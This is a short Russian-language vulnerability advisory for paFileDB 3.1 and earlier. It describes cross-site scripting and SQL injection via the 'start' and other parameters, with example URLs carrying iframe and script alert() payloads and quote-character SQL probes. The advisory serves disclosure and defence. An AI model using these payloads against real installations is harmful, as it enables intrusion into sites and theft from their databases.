Программа: paFileDB 3.1 и более ранние версии

Уязвимость позволяет удаленному
пользователю произвести XSS нападение и
выполнить произвольные SQL команды в базе
данных уязвимого приложения.

1. Межсайтовый скриптинг возможен из-за
некорректной фильтрации входных данных в
некоторых параметрах. Злоумышленник может
с помощью специально сформированного URL
выполнить произвольный HTML сценарий в
браузере целевого пользователя.

Примеры:

http://[target]/[pafiledb_dir]/pafiledb.php?action=viewall&start=">
<iframe%20src=http://www.securityreason.com></iframe>&sortby=rating

http://[target]/[pafiledb_dir]/pafiledb.php?action=category&start=">
<iframe%20src=http://www.securityreason.com></iframe>&sortby=date

http://[target]/[pafiledb_dir]/pafiledb.php?"><script>alert();</script>

http://[target]/[pafiledb_d ir]/pafiledb.php?action="><script>alert();</script>

http://[target]/[pafiledb_dir]/pafiledb.php?[something]=">< script>alert();</script>

http://[target]/[pafiledb_dir]/p
afiledb.php?[something]=&[something]="> <script>alert();</script>

2. Отсутствует фильтрация входных данных в
параметре start. Удаленный пользователь может
с помощью специально сформированного URL
выполнить произвольные SQL команды на
уязвимой системе.

Пример:

http://[target]/[pafiledb_dir]/pafiledb.php?action=viewall&start=’&sortby=rating

http://[target]/[pafiledb_dir]/pafiledb.php?action=category&start=’&sortby=rating



Оставить мнение